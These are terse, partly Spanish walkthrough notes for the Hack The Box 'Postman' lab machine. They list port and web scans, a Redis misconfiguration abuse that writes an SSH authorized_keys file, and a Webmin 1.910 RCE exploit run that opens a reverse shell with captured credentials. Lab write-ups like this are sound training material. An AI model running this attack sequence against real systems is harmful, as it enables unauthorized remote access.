
Postman
HTB Linux
nmap -A -p- -oA output 10.129.2.1 —min-rate=10000 —script=vuln —script-timeout=15 -v
nmap -sC -sV -O -p- -oA postman 10.129.2.1
nmap -sU -O -p- -oA postman-udp 10.129.2.1
nikto -h 10.129.2.1:80
redis-cli -h 10.129.2.1
config get dir
config set dir “/etc/”
config set dir “/var/lib/redis”
Vemos un webmin login. Pero sin credenciales es imposible.
searchsploit webmin
wfuzz -c —hc=404 -w /SecLists/Discovery/Web-Content/IIS.fuzz.txt http://10.129.2.1/FUZZ
openssl s_client -connect 10.129.2.1:10000
Encontramos un correo root@Postman
config set dir “/var/lib/redis.ssh”
config set dbfilename authorized_keys
ssh-keygen
Esto no me funciono.
https://github.com/NaveenNguyen/Webmin-1.910-Package-Updates-RCE/blob/master/exploit_poc.py
redis-cli -h 10.129.2.1
config set dbfilename authorized_keys
save
cat key | redis-cli -h 10.129.2.1 -x set 1
python3 exploit_poc.py —ip_address=10.129.2.1 —port=10000 —lhost=10.10.14.135 —lport=443 —user=Matt —pass=computer2008
whoami